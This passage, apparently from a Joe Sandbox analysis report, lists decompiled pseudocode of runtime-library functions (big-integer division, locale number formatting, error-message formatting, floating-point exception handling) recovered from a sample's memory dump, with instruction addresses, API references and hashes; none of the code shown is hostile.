														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00B7F0E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xb8ea5d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00B921C0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00B8BDE1(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00B8BDE1(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00B8BDE1(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x00b8d44c
0x00b8d44f
0x00b8d453
0x00b8d45d
0x00b8d460
0x00b8d462
0x00b8d464
0x00b8d471
0x00b8d471
0x00b8d474
0x00b8d474
0x00b8d477
0x00b8d47a
0x00b8d47c
0x00b8d5af
0x00b8d5b1
0x00b8d5fa
0x00b8d5fe
0x00b8d604
0x00b8d5b3
0x00b8d5b5
0x00b8d5b8
0x00b8d5ba
0x00b8d5bd
0x00b8d5bf
0x00b8d5c1
0x00b8d5f5
0x00b8d5f5
0x00b8d5f5
0x00b8d5c3
0x00b8d5c8
0x00b8d5ce
0x00b8d5ce
0x00b8d5d1
0x00b8d5d3
0x00b8d5d5
0x00000000
0x00000000
0x00b8d5d7
0x00b8d5d8
0x00b8d5db
0x00b8d5de
0x00b8d5e0
0x00000000
0x00b8d5e2
0x00000000
0x00b8d5e2
0x00000000
0x00b8d5e0
0x00b8d5e4
0x00b8d5eb
0x00b8d5ef
0x00b8d5f3
0x00000000
0x00000000
0x00b8d5f3
0x00b8d5f6
0x00b8d5f6
0x00b8d5f8
0x00b8d605
0x00b8d608
0x00b8d60b
0x00b8d60e
0x00b8d60e
0x00b8d612
0x00b8d615
0x00b8d618
0x00b8d61b
0x00b8d626
0x00b8d61d
0x00b8d622
0x00b8d622
0x00b8d630
0x00b8d635
0x00b8d638
0x00b8d63a
0x00b8d644
0x00b8d647
0x00b8d64e
0x00b8d651
0x00b8d654
0x00b8d65c
0x00b8d662
0x00b8d662
0x00b8d662
0x00b8d662
0x00b8d654
0x00b8d667
0x00b8d66e
0x00b8d66e
0x00b8d671
0x00b8d674
0x00b8d8a6
0x00b8d8a6
0x00b8d67a
0x00b8d67a
0x00b8d680
0x00b8d683
0x00b8d686
0x00b8d689
0x00b8d68c
0x00b8d68f
0x00b8d692
0x00b8d692
0x00b8d695
0x00b8d69c
0x00b8d69c
0x00b8d697
0x00b8d697
0x00b8d697
0x00b8d69e
0x00b8d6a2
0x00b8d6a5
0x00b8d6a7
0x00b8d6aa
0x00b8d6b1
0x00b8d6b4
0x00b8d6b7
0x00b8d6c2
0x00b8d6c5
0x00b8d6ca
0x00b8d6cf
0x00b8d6d6
0x00b8d6db
0x00b8d6dd
0x00b8d6df
0x00b8d6e3
0x00b8d6e6
0x00b8d6e9
0x00b8d6f1
0x00b8d6fa
0x00b8d6fa
0x00b8d6fc
0x00b8d6ff
0x00b8d6ff
0x00b8d6e9
0x00b8d709
0x00b8d70e
0x00b8d713
0x00b8d715
0x00b8d718
0x00b8d71a
0x00b8d71d
0x00b8d720
0x00b8d722
0x00b8d725
0x00b8d728
0x00b8d72a
0x00b8d731
0x00b8d736
0x00b8d739
0x00b8d743
0x00b8d745
0x00b8d747
0x00b8d74a
0x00b8d74a
0x00b8d74c
0x00b8d74f
0x00b8d752
0x00b8d755
0x00b8d758
0x00b8d72c
0x00b8d72c
0x00b8d72f
0x00000000
0x00000000
0x00b8d72f
0x00b8d75b
0x00b8d75d
0x00b8d75f
0x00000000
0x00b8d761
0x00b8d761
0x00b8d764
0x00b8d766
0x00b8d766
0x00b8d774
0x00b8d777
0x00b8d77c
0x00b8d77e
0x00000000
0x00000000
0x00b8d780
0x00b8d787
0x00b8d787
0x00b8d78a
0x00b8d78d
0x00b8d790
0x00b8d793
0x00b8d793
0x00b8d796
0x00b8d799
0x00b8d79d
0x00b8d7a0
0x00b8d7a2
0x00b8d7a5
0x00000000
0x00000000
0x00b8d7a7
0x00b8d7a5
0x00b8d782
0x00b8d782
0x00b8d785
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8d785
0x00b8d7ac
0x00b8d7ac
0x00000000
0x00b8d7ac
0x00b8d7a9
0x00000000
0x00b8d7a9
0x00b8d764
0x00b8d75f
0x00b8d7af
0x00b8d7af
0x00b8d7b1
0x00b8d7bb
0x00b8d7bb
0x00b8d7be
0x00b8d7c0
0x00b8d7c2
0x00b8d7c4
0x00b8d7c9
0x00b8d7cc
0x00b8d7cc
0x00b8d7cf
0x00b8d7d2
0x00b8d7d5
0x00b8d7d7
0x00b8d7ec
0x00b8d7ee
0x00b8d7f0
0x00b8d7f2
0x00b8d7f4
0x00b8d7f6
0x00b8d7f8
0x00b8d7fa
0x00b8d7fd
0x00b8d7fd
0x00b8d801
0x00b8d803
0x00b8d809
0x00b8d80c
0x00b8d80c
0x00b8d80c
0x00b8d810
0x00b8d810
0x00b8d815
0x00b8d818
0x00b8d818
0x00b8d81d
0x00b8d81f
0x00b8d821
0x00b8d828
0x00b8d828
0x00b8d82a
0x00b8d82f
0x00b8d831
0x00b8d834
0x00b8d834
0x00b8d837
0x00b8d840
0x00b8d840
0x00b8d842
0x00b8d842
0x00b8d847
0x00b8d84d
0x00b8d851
0x00b8d854
0x00b8d857
0x00b8d859
0x00b8d859
0x00b8d859
0x00b8d85e
0x00b8d85e
0x00b8d861
0x00b8d864
0x00b8d823
0x00b8d823
0x00b8d826
0x00000000
0x00000000
0x00b8d826
0x00b8d821
0x00b8d86b
0x00b8d86b
0x00b8d86c
0x00b8d7b3
0x00b8d7b3
0x00b8d7b5
0x00000000
0x00000000
0x00b8d7b5
0x00b8d87c
0x00b8d881
0x00b8d884
0x00b8d888
0x00b8d889
0x00b8d88c
0x00b8d88f
0x00b8d890
0x00b8d893
0x00b8d896
0x00b8d899
0x00b8d89c
0x00b8d89c
0x00b8d8a4
0x00b8d8ab
0x00b8d8ac
0x00b8d8ae
0x00b8d8b0
0x00b8d8b2
0x00b8d8b5
0x00b8d8c0
0x00b8d8c0
0x00b8d8c6
0x00b8d8c6
0x00b8d8c9
0x00b8d8ca
0x00b8d8ca
0x00b8d8c0
0x00b8d8ce
0x00b8d8d0
0x00b8d8d2
0x00b8d8d4
0x00b8d8d4
0x00b8d8d6
0x00b8d8da
0x00000000
0x00000000
0x00b8d8dc
0x00b8d8dc
0x00b8d8df
0x00b8d8e1
0x00000000
0x00000000
0x00000000
0x00b8d8e1
0x00b8d8d4
0x00b8d8e3
0x00b8d8ed
0x00000000
0x00000000
0x00000000
0x00b8d5f8
0x00b8d482
0x00b8d482
0x00b8d482
0x00b8d485
0x00b8d488
0x00b8d48b
0x00b8d4bc
0x00b8d4be
0x00b8d509
0x00b8d50b
0x00b8d512
0x00b8d519
0x00b8d51c
0x00b8d51f
0x00b8d525
0x00b8d525
0x00b8d526
0x00b8d529
0x00b8d530
0x00b8d539
0x00b8d53e
0x00b8d541
0x00b8d546
0x00b8d549
0x00b8d54b
0x00b8d550
0x00b8d553
0x00b8d556
0x00b8d556
0x00b8d556
0x00b8d55a
0x00b8d55d
0x00b8d55d
0x00b8d562
0x00b8d562
0x00b8d56d
0x00b8d578
0x00b8d578
0x00b8d57b
0x00b8d587
0x00b8d58c
0x00b8d597
0x00b8d599
0x00b8d59b
0x00b8d5a1
0x00b8d5a6
0x00b8d5a8
0x00b8d5ae
0x00b8d4c0
0x00b8d4cc
0x00b8d4cc
0x00b8d4cf
0x00b8d4df
0x00b8d4e5
0x00b8d4ec
0x00b8d4ee
0x00b8d4f6
0x00b8d4f8
0x00b8d4fa
0x00b8d4ff
0x00b8d502
0x00b8d508
0x00b8d508
0x00b8d48d
0x00b8d490
0x00b8d494
0x00b8d49a
0x00b8d4a9
0x00b8d4b3
0x00b8d4bb
0x00b8d4bb
0x00b8d48b
0x00b8d466
0x00b8d469
0x00b8d46f
0x00b8d46f
0x00b8d455
0x00b8d45b
0x00b8d45b

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 8f6740d4e7707d8b87800fa4972e981da1cbdb60bbf3c415ca56c9966a1b6748
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 69022C75E002199FDF14DFA9D8806ADB7F1EF48324F2582AAD919E7394D730AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AF0F Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7AF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xb9e73c == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xbbfcb0 = _v304;
					 *0xbbfcb2 = 0;
					 *0xb9e73c = 0xbbfcb0;
				}
				E00B704BD(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xb9e72c, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x00b7af27
0x00b7af35
0x00b7af42
0x00b7af4a
0x00b7af50
0x00b7af50
0x00b7af66
0x00b7af6b
0x00b7af70
0x00b7af7a
0x00b7af84
0x00b7af8c
0x00b7af95

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B7AF35
GetNumberFormatW.KERNEL32 ref: 00B7AF84

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 733120d6ad5a791b017f5fcb88322dbb8bbb94675ae2bc2b63d42f2324b597dd
Instruction ID: e5cc05903d1a6da91c7a548475d51e86c5bd656b41882c8f4710cdb3eaae233d
Opcode Fuzzy Hash: 733120d6ad5a791b017f5fcb88322dbb8bbb94675ae2bc2b63d42f2324b597dd
Instruction Fuzzy Hash: E8015E3A100309ABDB10DFA4ED45FAA77F8EF08750F009062FA15A7161D77499558BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B66C74 Relevance: 3.0, APIs: 2, Instructions: 16
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B66C74(WCHAR* _a4, long _a8) {
				long _t5;

				_t5 = GetLastError();
				if(_t5 == 0) {
					return 0;
				}
				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
			}

0x00b66c74
0x00b66c7c
0x00000000
0x00b66ca2
0x00000000

APIs

GetLastError.KERNEL32(00B66DDF,00000000,00000400), ref: 00B66C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B66C95

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c0289930d00a4e82a74d85997ec1e2698760f4241efbd5c1dcc86002880a1c46
Instruction ID: 1aa61c90ff2846286bd42a71f9359ecd8dc4998e9e70a7ab84dcb16549385333
Opcode Fuzzy Hash: c0289930d00a4e82a74d85997ec1e2698760f4241efbd5c1dcc86002880a1c46
Instruction Fuzzy Hash: 56D0C931344300BFFA110B628E56F2A7BD9FF46F51F18C445B795E90E0CE789824E629

Uniqueness

Uniqueness Score: -1.00%

Function 00B919F4 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B919F4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00B8F352(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00B8F2B8(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00b91a02
0x00b91a09
0x00b91a0e
0x00b91a14
0x00b91a17
0x00b91a1d
0x00b91a22
0x00b91a27
0x00b91a27
0x00b91a2d
0x00b91a32
0x00b91a37
0x00b91a37
0x00b91a3e
0x00b91a43
0x00b91a48
0x00b91a48
0x00b91a4f
0x00b91a54
0x00b91a59
0x00b91a59
0x00b91a60
0x00b91a65
0x00b91a6a
0x00b91a6a
0x00b91a72
0x00b91a82
0x00b91a94
0x00b91aa6
0x00b91ab9
0x00b91acb
0x00b91ad3
0x00b91ad8
0x00b91add
0x00b91add
0x00b91ae4
0x00b91ae9
0x00b91ae9
0x00b91af0
0x00b91af5
0x00b91af5
0x00b91afc
0x00b91b01
0x00b91b01
0x00b91b08
0x00b91b0d
0x00b91b0d
0x00b91b17
0x00b91b19
0x00b91b53
0x00b91b1b
0x00b91b20
0x00b91b44
0x00b91b4c
0x00b91b40
0x00b91b40
0x00b91b56
0x00b91b5d
0x00b91b5f
0x00b91b81
0x00b91b89
0x00b91b8c
0x00b91b8c
0x00b91b8e
0x00b91b8e
0x00b91b99
0x00b91b9f
0x00b91ba4
0x00b91bab
0x00b91be5
0x00b91bf0
0x00b91bf6
0x00b91bf9
0x00b91bfc
0x00b91c08
0x00b91c10
0x00b91bad
0x00b91bb0
0x00b91bbc
0x00b91bc2
0x00b91bc8
0x00b91bcb
0x00b91bd4
0x00b91bd4
0x00b91c13
0x00b91c21
0x00b91c27
0x00b91c2e
0x00b91c30
0x00b91c30
0x00b91c37
0x00b91c39
0x00b91c39
0x00b91c40
0x00b91c42
0x00b91c42
0x00b91c49
0x00b91c4b
0x00b91c4b
0x00b91c52
0x00b91c54
0x00b91c54
0x00b91c61
0x00b91c64
0x00b91c9b
0x00b91c66
0x00b91c66
0x00b91c69
0x00b91c94
0x00b91c89
0x00b91c89
0x00b91c9d
0x00b91ca5
0x00b91ca8
0x00b91cc7
0x00b91ccc
0x00b91ccc
0x00b91cce
0x00b91cd3
0x00b91cdf
0x00b91cd5
0x00b91cd8
0x00b91cd8
0x00b91ce4
0x00b91ce4
0x00b91caa
0x00b91cad
0x00b91cbc
0x00000000
0x00b91cbc
0x00b91caf
0x00b91cb2
0x00b91cb4
0x00b91cb4
0x00000000
0x00b91cb2
0x00b91c6b
0x00b91c6e
0x00b91c84
0x00000000
0x00b91c84
0x00b91c73
0x00b91c75
0x00b91c75
0x00b91c73
0x00000000
0x00b91c64
0x00b91b66
0x00b91b74
0x00b91b7c
0x00000000
0x00b91b7c
0x00b91b6a
0x00b91b6f
0x00b91b6f
0x00000000
0x00b91b6a
0x00b91b27
0x00b91b35
0x00b91b3d
0x00000000
0x00b91b3d
0x00b91b2b
0x00b91b30
0x00b91b30
0x00b91b2b

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B919EF,?,?,00000008,?,?,00B9168F,00000000), ref: 00B91C21

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
